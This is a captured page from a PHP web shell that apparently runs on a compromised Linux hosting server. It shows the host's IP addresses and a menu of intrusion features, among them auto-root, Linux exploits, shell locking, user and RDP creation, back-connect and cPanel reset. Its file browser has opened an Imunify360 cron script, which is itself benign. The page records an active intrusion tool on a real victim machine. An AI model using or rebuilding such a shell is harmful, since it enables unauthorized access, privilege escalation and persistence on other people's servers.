Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.119.113.79
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
imunify360 /
venv /
share /
imunify360 /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
check-detached.py
1.11
KB
-rwxr-xr-x
create_default_config
1.23
KB
-rwxr-xr-x
delay_on_cron_call.py
1.12
KB
-rwxr-xr-x
imunify-disable-cpu-accounting...
792
B
-rwxr--r--
imunify-doctor.sh
15.36
KB
-rwxr--r--
imunify-force-update.sh
2.99
KB
-rwxr--r--
purge-clamav
535
B
-rwxr-xr-x
update_components_versions.py
3.6
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : delay_on_cron_call.py
#!/opt/imunify360/venv/bin/python3 """ Script for internal use in cron update scripts. This script detects when parent call was maid from cron job and apply the random delay in 60 minutes """ import os import psutil import random import time MAX_SLEEP_TIME = 3600 def is_current_process_cron_child(): pid = os.getpid() try: process = psutil.Process(pid) parents = process.parents() # True for cron cronie anacron and etc.. return any(is_cron(proc.name().lower()) for proc in parents) except psutil.NoSuchProcess: print("Unable to determine parent process ID.") return False def is_cron(proc_name: str): return "cron" in proc_name and not "imunify" in proc_name def sleep_in_cron(): try: if is_current_process_cron_child(): sleep_time = random.randint(0, MAX_SLEEP_TIME) print(f"Wait for {sleep_time} seconds before starting updates") time.sleep(sleep_time) else: print("Not in cron, run update immediately") except Exception as e: print("An error occurred while waiting: ", e) sleep_in_cron()
Close